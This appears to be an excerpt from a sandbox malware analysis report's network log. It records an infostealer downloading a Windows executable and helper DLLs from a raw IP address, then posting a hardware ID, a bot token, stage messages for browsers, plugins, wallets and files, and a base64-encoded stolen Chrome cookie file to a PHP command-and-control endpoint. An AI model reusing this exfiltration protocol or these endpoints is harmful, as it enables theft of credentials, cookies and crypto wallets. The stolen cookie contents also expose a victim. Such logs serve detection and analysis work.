Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Jul 2024 05:21:00 GMTContent-Type: application/octet-streamContent-Length: 2564096Last-Modified: Mon, 01 Jul 2024 04:14:30 GMTConnection: keep-aliveETag: "66822d26-272000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 dc 95 c0 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 c0 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 f0 9d 00 f3 0c 00 00 14 fd 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 7a 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 f0 22 00 00 c0 9d 00 00 ec 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBAHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 30 30 34 37 42 42 42 30 42 38 33 39 34 36 30 39 38 34 33 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 2d 2d 0d 0a Data Ascii: ------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="hwid"F10047BBB0B83946098432------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="build"default------GCGCFCBAKKFBFIECAEBA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDAFIEHIEGDHIDGDGHDHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 2d 2d 0d 0a Data Ascii: ------HJDAFIEHIEGDHIDGDGHDContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------HJDAFIEHIEGDHIDGDGHDContent-Disposition: form-data; name="message"browsers------HJDAFIEHIEGDHIDGDGHD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGDHCFCAAECAKECBAFHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 2d 2d 0d 0a Data Ascii: ------JKEGDHCFCAAECAKECBAFContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------JKEGDHCFCAAECAKECBAFContent-Disposition: form-data; name="message"plugins------JKEGDHCFCAAECAKECBAF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="message"fplugins------FIIDBKJJDGHDHJKEHJDB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIHost: 85.28.47.4Content-Length: 6483Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEBHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 2d 2d 0d 0a Data Ascii: ------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3L
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file"------GIIEGHIDBGHIECAAECGD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file"------GIIEGHIDBGHIECAAECGD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file"------GIIEGHIDBGHIECAAECGD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHDHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="file"------JEBKECAFIDAFIECBKEHD--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 85.28.47.4Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJDGIDBAAFIDGCGCAKHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 2d 2d 0d 0a Data Ascii: ------IEHJDGIDBAAFIDGCGCAKContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------IEHJDGIDBAAFIDGCGCAKContent-Disposition: form-data; name="message"wallets------IEHJDGIDBAAFIDGCGCAK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="message"files------EGIDAAFIEHIEHJKFHCAE--
